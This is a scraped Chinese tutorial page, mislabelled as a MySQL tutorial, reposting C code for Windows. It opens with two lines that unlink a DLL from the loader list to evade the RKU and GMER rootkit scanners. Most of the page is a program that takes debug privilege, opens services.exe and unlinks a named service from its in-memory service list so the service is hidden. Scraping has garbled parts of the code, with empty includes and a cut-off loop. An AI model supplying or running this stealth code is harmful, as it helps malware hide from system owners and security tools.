Home > Database > Mysql Tutorial > ring3下隐藏服务的代码

ring3下隐藏服务的代码

WBOY
Release: 2016-06-07 15:06:14
Original
1102 people have browsed it

来自: ASM 过RKU,GMAER的dll模块检查的 代码 ,就两句: ldm-HashLinks.Blink-Flink = ldm-HashLinks.Flink; ldm-HashLinks.Flink-Blink = ldm-HashLinks.Blink; //下面是一个ring3下 隐藏 服务 的 代码 ,也是抄别人小小修改了一下而已的: #include #incl

来自:ASM

过RKU,GMAER的dll模块检查的代码,就两句:

ldm->HashLinks.Blink->Flink = ldm->HashLinks.Flink;
ldm->HashLinks.Flink->Blink = ldm->HashLinks.Blink;

//下面是一个ring3下隐藏服务代码,也是抄别人小小修改了一下而已的:

#include
#include
#include
#include

// 几个Undocument的结构
typedef struct _SC_SERVICE_PROCESS SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;
typedef struct _SC_DEPEND_SERVICE SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;
typedef struct _SC_SERVICE_RECORD SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

typedef struct _SC_SERVICE_PROCESS
{
PSC_SERVICE_PROCESS Previous;
PSC_SERVICE_PROCESS Next;
WCHAR *ImagePath;
DWORD Pid;
DWORD NumberOfServices;
// ...
} SC_SERVICE_PROCESS, *PSC_SERVICE_PROCESS;

typedef struct _SC_DEPEND_SERVICE
{
PSC_DEPEND_SERVICE Next;
DWORD Unknow;
PSC_SERVICE_RECORD Service;
// ...
} SC_DEPEND_SERVICE, *PSC_DEPEND_SERVICE;

typedef struct _SC_SERVICE_RECORD
{
PSC_SERVICE_RECORD Previous;
PSC_SERVICE_RECORD Next;
WCHAR *ServiceName;
WCHAR *DisplayName;
DWORD Index;
DWORD Unknow0;
DWORD sErv;
DWORD ControlCount;
DWORD Unknow1;
PSC_SERVICE_PROCESS Process;
SERVICE_STATUS Status;
DWORD StartType;
DWORD ErrorControl;
DWORD TagId;
PSC_DEPEND_SERVICE DependOn;
PSC_DEPEND_SERVICE Depended;
// ...
} SC_SERVICE_RECORD, *PSC_SERVICE_RECORD;

int WINAPI UnicodeToAnsiStr(OUT char *lpChar, IN WCHAR *lpWideChar)
{
int iLen;

iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, NULL, 0, NULL, NULL);
if ((iLen > 1) || (iLen {
ZeroMemory(lpChar, 40);
iLen = WideCharToMultiByte(CP_ACP, 0, lpWideChar, -1, lpChar, iLen, NULL, NULL);
}

return iLen;
}

BOOL SetDebugPrivilege()
{
BOOL bRet = FALSE;
HANDLE hToken = NULL;
LUID luid;
TOKEN_PRIVILEGES tp;

if (OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) &&
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
}

if (hToken) CloseHandle(hToken);
return bRet;
}

DWORD GetProcessIdByName(char *Name)
{
BOOL bRet = FALSE;
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
DWORD Pid = -1;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcessSnap) return -1;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (Process32First(hProcessSnap, &pe32))
{
do
{
if (!lstrcmpi(pe32.szExeFile, Name ) )
{
Pid = pe32.th32ProcessID;
break;
}
}
while (Process32Next(hProcessSnap, &pe32));
}

CloseHandle(hProcessSnap);
return Pid;
}

// 修改内存属性为指定值
void ProtectWriteDword(HANDLE hProcess, DWORD *Addr, DWORD Value)
{
MEMORY_BASIC_INFORMATION mbi;
DWORD dwOldProtect, dwWritten;

VirtualQueryEx(hProcess, Addr, &mbi, sizeof(mbi));
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, PAGE_READWRITE, &mbi.Protect);
WriteProcessMemory(hProcess, Addr, &Value, sizeof(DWORD), &dwWritten);
VirtualProtectEx(hProcess, mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &dwOldProtect);
}

//寻找服务链表
PSC_SERVICE_RECORD FindFirstServiceRecord(HANDLE hProcess)
{
char FileName[MAX_PATH+1];
HANDLE hFile, hFileMap;
UCHAR * pMap;
DWORD dwSize, dwSizeHigh, i, dwRead;
SC_SERVICE_RECORD SvcRd, *pSvcRd, *pRet = NULL;

GetSystemDirectory( FileName, MAX_PATH );
strcat( FileName,"Services.exe");

hFile = CreateFile(FileName, GENERIC_READ, FILE_SHARE_READ,
NULL, OPEN_EXISTING, 0, NULL);
if (INVALID_HANDLE_VALUE == hFile) return NULL;

dwSizeHigh = 0;
dwSize = GetFileSize(hFile, &dwSizeHigh);

hFileMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
if (NULL == hFileMap) return NULL;

pMap = (UCHAR*)MapViewOfFile(hFileMap, FILE_MAP_READ, 0, 0, 0);
if (NULL == pMap) return NULL;

dwSize -= 12;
for (i=0; i
{
// 搜索services!ScGetServiceDatabase特征代码
if (*(DWORD*)(pMap+i) == 0xa1909090 &&
*(DWORD*)(pMap+i+8) == 0x909090c3)
{
if (ReadProcessMemory(hProcess, *(PVOID*)(pMap+i+4), &pSvcRd, sizeof(PVOID), &dwRead) &&
ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
SvcRd.sErv == vrEs) // ServiceRecord结构的特征
{
pRet = pSvcRd;
break;
}
}
}

UnmapViewOfFile(pMap);
CloseHandle(hFileMap);
CloseHandle(hFile);

//printf( "addr: 0x%08xn", (DWORD *)pRet );
return pRet;
}

// 隐藏服务
BOOL HideService(char *Name)
{
DWORD Pid;
HANDLE hProcess;
SC_SERVICE_RECORD SvcRd, *pSvcRd;
DWORD dwRead, dwNameSize;
WCHAR SvcName[MAX_PATH] = { 0 };
char lpSvcName[256] = {0};

dwNameSize = strlen(Name)*2; //UNICODE的话,长度要乘以2

if (dwNameSize > sizeof(SvcName))
{
return FALSE;
}

Pid = GetProcessIdByName("Services.exe");
if (Pid == -1)
{
printf("get pid errorrn");
return FALSE;
}

if(!SetDebugPrivilege())
{
printf("SetDebugPrivilege errorrn");
return FALSE;
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
if (NULL == hProcess)
{
printf("OpenProcess error:%drn",GetLastError());
return FALSE;
}
pSvcRd = FindFirstServiceRecord(hProcess);
if (NULL == pSvcRd)
{
printf("FindFirstServiceRecord errorrn");
CloseHandle(hProcess);
return FALSE;
}

do
{
if (ReadProcessMemory(hProcess, pSvcRd, &SvcRd, sizeof(SvcRd), &dwRead) &&
ReadProcessMemory(hProcess, SvcRd.ServiceName, SvcName, dwNameSize, &dwRead))
{
//OutputDebugStringW(SvcName);
// 匹配服务
memset(lpSvcName,0,sizeof(lpSvcName));
UnicodeToAnsiStr(lpSvcName,SvcName);
if (lstrcmpi(lpSvcName, Name) == NULL)
{
// 从链表中断开(一般来说ServiceRecord是可写的,但还是先改保护属性以防万一)
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Previous+1, (DWORD)SvcRd.Next);
ProtectWriteDword(hProcess, (DWORD *)SvcRd.Next, (DWORD)SvcRd.Previous);
CloseHandle(hProcess);
return TRUE;
}
}
else
{
break;
}
}
while (pSvcRd = SvcRd.Next);

if( NULL != hProcess )
{
CloseHandle(hProcess);
}

return FALSE;
}
int main()
{
HideService("Alerter");
return 0;
}

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template